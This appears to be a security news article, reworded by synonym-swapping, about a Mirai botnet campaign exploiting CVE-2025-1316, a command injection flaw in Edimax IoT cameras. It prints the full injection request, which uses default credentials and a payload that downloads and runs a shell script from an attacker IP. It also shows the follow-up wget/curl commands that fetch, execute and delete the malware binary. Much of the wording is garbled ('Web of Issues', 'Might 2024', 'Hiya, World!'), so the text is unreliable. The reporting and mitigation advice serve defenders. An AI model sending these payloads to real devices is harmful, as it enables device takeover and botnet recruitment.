A current alert from the Akamai Safety Intelligence and Response Group (SIRT) has highlighted the exploitation of a extreme command injection vulnerability in Edimax Web of Issues (IoT) units.
This vulnerability, designated as CVE-2025-1316, has been actively utilized by a number of botnets to unfold Mirai malware.
Mirai is infamous for compromising IoT units and orchestrating distributed denial-of-service (DDoS) assaults.
Vulnerability Overview
The CVE-2025-1316 vulnerability targets the /camera-cgi/admin/param.cgi endpoint in Edimax units, permitting attackers to inject instructions into the NTP_serverName choice inside the ipcamSource parameter.
For profitable exploitation, default credentials corresponding to admin:1234 are used. Though the CVE particularly mentions Edimax’s IC-7100 community digicam, the vulnerability doubtless impacts a broader vary of Edimax units.
Akamai SIRT first detected exercise focusing on this vulnerability of their honeypots in early October 2024.
Nonetheless, the proof of idea (PoC) exploit dates again to June 2023. The earliest exploit makes an attempt noticed had been in Might 2024, with spikes in September 2024 and January-February 2025.
These assaults had been attributed to completely different botnets, together with Mirai variants.
Instance Exploit Code
The exploit injects instructions to execute a shell script on the machine. Right here’s an instance of the request payload:
/camera-cgi/admin/param.cgi motion=replace&ipcamSource=/ntp.asp?r=20130724&NTP_enable=1&NTP_serverName=;$(cd /tmp; wget http://193.143.1[.]118/curl.sh; chmod 777 curl.sh; sh curl.sh)&NTP_tzCityNo=16&NTP_tzMinute=0&NTP_daylightSaving=0This script downloads and executes a Mirai malware variant for various architectures, corresponding to ARM, MIPS, and x86.
Malware Execution Instructions
As soon as downloaded, the malware is executed via instructions like:
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;
wget http://193.143.1[.]118/x86;
curl -O http://193.143.1[.]118/x86;
cat x86 > OSGt;
chmod +x *;
./OSGt joined;
rm -rf OSGtComparable instructions are used for different architectures like MIPS and ARM.
Mirai Botnets
Two distinct botnets have been recognized exploiting this vulnerability:
- First Botnet: This botnet makes use of the exploit to obtain and execute a curl.sh script. It communicates with the command and management (C2) server by way of angela.spklove[.]com over port 3093. The malware prints “VagneRHere” upon execution.
- Second Botnet: This botnet downloads and runs a wget.sh script, which executes Mirai malware. The malware consists of antidebugging features and prints “Hiya, World!” upon execution.
Each botnets exploit a number of recognized vulnerabilities, together with a Docker API exploit and CVE-2024-7214 affecting TOTOLINK units.
Mitigation and Suggestions
To guard in opposition to these threats:
- Improve Gadgets: Substitute outdated or weak units with newer fashions.
- Change Default Credentials: Guarantee all units use sturdy, distinctive passwords.
- Monitor Networks: Look ahead to suspicious exercise, corresponding to uncommon site visitors patterns.
- Implement Safety Measures: Use firewalls and intrusion detection programs to dam exploit makes an attempt.
Because the legacy of Mirai malware continues to affect IoT safety, staying knowledgeable and proactive is essential for safeguarding these units.
The continued exploitation of Edimax IoT units highlights the persistent dangers related to legacy firmware and the pervasive menace of Mirai malware.
Common monitoring and proactive safety methods are important in defending in opposition to evolving cyber threats.
Are you from SOC/DFIR Groups? – Analyse Malware Incidents & get dwell Entry with ANY.RUN -> Begin Now for Free.
